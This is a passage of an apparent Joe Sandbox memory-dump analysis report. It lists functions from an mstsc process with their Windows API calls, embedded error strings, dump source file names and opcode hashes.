                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                                                    • Opcode ID: 1ff96415af520916c29ac46d493bf2145cdd8ed9a0d217d8f8d0c34618e08d04
                                                                                                                                                                                    • Instruction ID: 93a6b678506cc3690879e634b506348b8665afc523442515f5fa47b7da9de530
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff96415af520916c29ac46d493bf2145cdd8ed9a0d217d8f8d0c34618e08d04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6341D370610304ABDB20EFA8CC99FAB77BAAF44720F218649F9559B2C4D774E941CB71
                                                                                                                                                                                    Function 00915A06 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00914F5C,?,00000000), ref: 00915A89
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • DeleteFileW.KERNEL32(009691C0,?,?,?,?,?,?,00914F5C,?,00000000), ref: 00915B3F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to start remote application, xrefs: 00915AC7
                                                                                                                                                                                    • Invalid CopyData params, xrefs: 00915B05
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$AddressDeleteFileFreeLibraryMessageProcTrace
                                                                                                                                                                                    • String ID: Failed to start remote application$Invalid CopyData params
                                                                                                                                                                                    • API String ID: 2091952702-75341140
                                                                                                                                                                                    • Opcode ID: a2397b7146012bf060a3df6041190fabaff08d9439b9261e80b53ff7be1114d8
                                                                                                                                                                                    • Instruction ID: 12081bbb4f94e51f302b0a34160c01e9b4bd40005881c097a6c00b1874d08080
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2397b7146012bf060a3df6041190fabaff08d9439b9261e80b53ff7be1114d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1241C331788709EFDB298F54D849FA63AAAAFC4300B17405CF9019B2A1DAB0DCC0DB50
                                                                                                                                                                                    Function 009581BA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 009582DE
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,009581B1,?,00000000), ref: 009582EC
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Unable to initialize file name from moniker!, xrefs: 00958206
                                                                                                                                                                                    • Failed to close file stream!, xrefs: 00958299
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCreateErrorFileFreeHandleLastLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: Failed to close file stream!$Unable to initialize file name from moniker!
                                                                                                                                                                                    • API String ID: 3465984092-1650752352
                                                                                                                                                                                    • Opcode ID: fbde62c779ee6a1d05972c8a6693a30e1a686af7dd3cb73cfd681c13c18c3716
                                                                                                                                                                                    • Instruction ID: 841f9618d75bebf58d2393c6512f7cf812b438a677b64d63e317b151714b5e01
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbde62c779ee6a1d05972c8a6693a30e1a686af7dd3cb73cfd681c13c18c3716
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F410432A14B15AFD725CF56C848F227A99BB09B51F040159FD10FB2A2CB70DC94AF81
                                                                                                                                                                                    Function 00922810 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExtractIconW.SHELL32(?,00000440,00000000), ref: 0092294D
                                                                                                                                                                                    • LoadIconW.USER32 ref: 00922960
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Icon$AddressExtractFreeHandleLibraryLoadMessageModuleProcTrace
                                                                                                                                                                                    • String ID: Icon File$Icon Index
                                                                                                                                                                                    • API String ID: 494351486-3007940515
                                                                                                                                                                                    • Opcode ID: d6775b28fe2a46101f03c171ec809347d1a7bb90bc6b16fd131e853af0724e3b
                                                                                                                                                                                    • Instruction ID: ad2e1e8c1ff42ebc38eed7abed3bf5c9be61f479bd2423877481eaaa48f878ae
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6775b28fe2a46101f03c171ec809347d1a7bb90bc6b16fd131e853af0724e3b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41BF357143447FD7299F24AC49F967BDEBB88314F040019FA00A72E6CBB4D8909B91
                                                                                                                                                                                    Function 0093F37A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CM_Get_DevNode_Registry_PropertyW.CFGMGR32(00000000,00000003,?,00000000,?,00000000,?,?,00000000,?,?,0093F51F,?,?), ref: 0093F3A8
                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,0093F51F,?,?,?,?,?,?,0093F653,?,?,?), ref: 0093F3CC
                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,0093F51F,?,?,?,?,?,?,0093F653,?,?,?), ref: 0093F456
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Get_Node_PropertyRegistry_
                                                                                                                                                                                    • String ID: USB\Class_07
                                                                                                                                                                                    • API String ID: 4267041287-3744949717
                                                                                                                                                                                    • Opcode ID: 563e200b99d5f484b5c0fa2d3c828282e3b2b07a17161f899fee409b935d49af
                                                                                                                                                                                    • Instruction ID: 5168ce283e0fbbdb39277c36d22d288c5883331d6f52f9822972f51091b3795c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 563e200b99d5f484b5c0fa2d3c828282e3b2b07a17161f899fee409b935d49af
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7310972E00101ABCB34AF68D86D6BFB3A9EB44754F55407DE90ADB290EB718D418B90
                                                                                                                                                                                    Function 0096612A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TlsFree.KERNEL32(?,0096BAA0,00000000,?,0096611F,?,00000001,?,00000000,00000000,0096AF68,?,00000001,00000000), ref: 0096614C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to terminate timer globals, xrefs: 00966183
                                                                                                                                                                                    • Failed to unregister the thread window class, xrefs: 009661C3
                                                                                                                                                                                    • Failed to unregister the timer window class, xrefs: 00966203
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free
                                                                                                                                                                                    • String ID: Failed to terminate timer globals$Failed to unregister the thread window class$Failed to unregister the timer window class
                                                                                                                                                                                    • API String ID: 3978063606-2031851587
                                                                                                                                                                                    • Opcode ID: 983b70ff970b450ce537f8fbf2b503faec3b77a43f1137766819a5393da1cc10
                                                                                                                                                                                    • Instruction ID: 0c0a040ffc21a593cf00faa2a6003dcb9b812e84febb778dd8afa3d5cf16b6b8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 983b70ff970b450ce537f8fbf2b503faec3b77a43f1137766819a5393da1cc10
                                                                                                                                                                                    • Instruction Fuzzy Hash: D731B471B183446FEB2A9FA1EC59B263B9ABBC9354F19044DE400D61B2C7B1CC82EF51
                                                                                                                                                                                    Function 00967243 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID: %s/%s$TERMSRV
                                                                                                                                                                                    • API String ID: 1033339047-1026481303
                                                                                                                                                                                    • Opcode ID: a49b3f2540748166b1279ea40ef86377bb4a446bbc0c7894559379ba9123ef61
                                                                                                                                                                                    • Instruction ID: a737e58a9f01adf4354629f2e8c6409607ae14017584a57dcd4cefed529d0331
                                                                                                                                                                                    • Opcode Fuzzy Hash: a49b3f2540748166b1279ea40ef86377bb4a446bbc0c7894559379ba9123ef61
                                                                                                                                                                                    • Instruction Fuzzy Hash: A5215BB3E48225ABCB219AD99805D6FFAA89FD57B4F1542A9FC04A7340DA34CE0096D0
                                                                                                                                                                                    Function 00954330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000098,009535CA,00000000,00000000,?,?,0095399A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0095434B
                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 009543B7
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,0095399A,00000000,00000000,00000000,00000000,00000000,?,?,?,009535CA,00000000,00000000,-00000001), ref: 009543CA
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$ActivityAllocControlEventFreeMessageTrace_wcslwr
                                                                                                                                                                                    • String ID: StringCchCopy failed!
                                                                                                                                                                                    • API String ID: 3261266422-2217176558
                                                                                                                                                                                    • Opcode ID: 6b0306a4e338a340717e2b5480b128985395bb999ab9d8fe454f5fade5da7df4
                                                                                                                                                                                    • Instruction ID: 08b8087ebbef7fa5f55b5ed2a73013972c7184d0aedb1dbb2c1483d37dda44f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b0306a4e338a340717e2b5480b128985395bb999ab9d8fe454f5fade5da7df4
                                                                                                                                                                                    • Instruction Fuzzy Hash: E5119C322043146FC726DF11DC08F2BBBA9EF8576AF10801DFD48672A1CAB0CC949B84
                                                                                                                                                                                    Function 0095E9EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFocus.USER32(?,0095D9F3,00000081,?,?,00000000,00000000,?,0095D97E,00000081,?,?), ref: 0095EA52
                                                                                                                                                                                    • IsChild.USER32(000000FF,00000000,?,0095D9F3,00000081,?,?,00000000,00000000,?,0095D97E,00000081,?,?), ref: 0095EA5C
                                                                                                                                                                                    • SetFocus.USER32 ref: 0095EA69
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • m_spOleInPlaceActiveObject->GetWindow failed, xrefs: 0095EA2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Focus$AddressChildFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: m_spOleInPlaceActiveObject->GetWindow failed
                                                                                                                                                                                    • API String ID: 3636661317-3056059153
                                                                                                                                                                                    • Opcode ID: d24406d29282c37f978242994052806c9c7f02b0889b70549e3a84c825851ebf
                                                                                                                                                                                    • Instruction ID: 208cc2d602ba10ca825f35faf27bb2544fa1f30dfd79340f7bc7470b2329acad
                                                                                                                                                                                    • Opcode Fuzzy Hash: d24406d29282c37f978242994052806c9c7f02b0889b70549e3a84c825851ebf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D11E372604304AFCB2ACF6ADC08F6A7BA9FF85311F104059F90497260C672CE45ABA4
                                                                                                                                                                                    Function 0094BBD1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MonitorFromWindow.USER32(?,00000000,?,?), ref: 0094BC00
                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,00000028), ref: 0094BC0F
                                                                                                                                                                                    • CopyRect.USER32(00000000,?), ref: 0094BC1E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Monitor$CopyFromInfoRectWindow
                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                    • API String ID: 3650910003-3887548279
                                                                                                                                                                                    • Opcode ID: d4938d3126bddcc4c55a4854b42d5abeb0678efea612b3df11d5efe1150c6227
                                                                                                                                                                                    • Instruction ID: f7b36a145bfa6b2d0cb79a8686f3dbe90a3e29dbce80ef302a2242a8899afc19
                                                                                                                                                                                    • Opcode Fuzzy Hash: d4938d3126bddcc4c55a4854b42d5abeb0678efea612b3df11d5efe1150c6227
                                                                                                                                                                                    • Instruction Fuzzy Hash: A1F0D171E00108ABD714DBAD9C88ABFB7ACDF48611B01452DE944E7250EF70DD0596A0
                                                                                                                                                                                    Function 022DFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3965848254-0
                                                                                                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                    • Instruction ID: 0dde98617c0ca3235a6c5abee37bc549590b9915882700adb0bf50fa4863d664
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4591A031E2024AEFDF24CFE8C9447AEB7B5FF45308F20846AD806A7599E7704A45CB95
                                                                                                                                                                                    Function 009178FA Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 201COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0091795D
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: CAxHostWnd$CreateExtension failed$OnPreCreateControl failed
                                                                                                                                                                                    • API String ID: 3058038507-92757506
                                                                                                                                                                                    • Opcode ID: 3a6bea4223f4f2ac3d69a1eb2ee1ff3cf836f0628b51616e3094818773e47075
                                                                                                                                                                                    • Instruction ID: 96a7c5bbae0c2f3ac92b346dbf98bd40a0e245ad5800c94c06f74e73a21b6157
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a6bea4223f4f2ac3d69a1eb2ee1ff3cf836f0628b51616e3094818773e47075
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6971C17175C34AAFC7298F94C848FA4BBBAAB49314B15018AE5049B2B2C775CCD0DF85
                                                                                                                                                                                    Function 009539CD Relevance: 6.1, APIs: 4, Instructions: 142memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,-00000003,009535CA,00000000,00000000,?,009539AA,00000000,00000000,009535CA,00000000,00000000,00000000,00000000,00000000,?), ref: 00953A26
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,009535C6,009535CA,00000000,00000000,?,009539AA,00000000,00000000,009535CA,00000000,00000000,00000000,00000000,00000000,?), ref: 00953A75
                                                                                                                                                                                    • memset.MSVCRT ref: 00953AD0
                                                                                                                                                                                    • wcstol.MSVCRT ref: 00953B4B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocLocal$memsetwcstol
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 389679083-0
                                                                                                                                                                                    • Opcode ID: d3d9628a1df5fb930c9caf0324a3f45b2382293459de1d49e1099dfcdbf12b19
                                                                                                                                                                                    • Instruction ID: 149afc70d7669cdcf2824f9709df294f4305bc45ecc26873317c6fb13b213c9d
                                                                                                                                                                                    • Opcode Fuzzy Hash: d3d9628a1df5fb930c9caf0324a3f45b2382293459de1d49e1099dfcdbf12b19
                                                                                                                                                                                    • Instruction Fuzzy Hash: E541F27160030AABDB28DF36D845B66779DEB44385F08C429FD46CB291E671DE449B90
                                                                                                                                                                                    Function 0092FA2F Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcstok_s.MSVCRT ref: 0092FBB3
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0092FBD8
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$AddressHandleLibraryLocalMessageModuleProcTracewcstok_s
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1445397207-0
                                                                                                                                                                                    • Opcode ID: 01fbe893cb4f8860031a8a44c3e80eacfd06bbd533ca7c9976b3668e83a27a49
                                                                                                                                                                                    • Instruction ID: 2fcb906c45551af513072c49cf952a5cc150639e9b401fac51c0a9b7c46bcbc8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 01fbe893cb4f8860031a8a44c3e80eacfd06bbd533ca7c9976b3668e83a27a49
                                                                                                                                                                                    • Instruction Fuzzy Hash: C74181759002299FDB249F24ECA9FEAB7B9EB48304F1441FAE80D93154EB309E959F50
                                                                                                                                                                                    Function 0092234F Relevance: 6.1, APIs: 4, Instructions: 109windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00922393
                                                                                                                                                                                    • SendMessageW.USER32(?,?,?,?), ref: 009223D4
                                                                                                                                                                                    • SetFocus.USER32 ref: 009223F3
                                                                                                                                                                                    • SendMessageW.USER32(?,00000005,?,00000000), ref: 00922447
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FocusProcWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2656717170-0
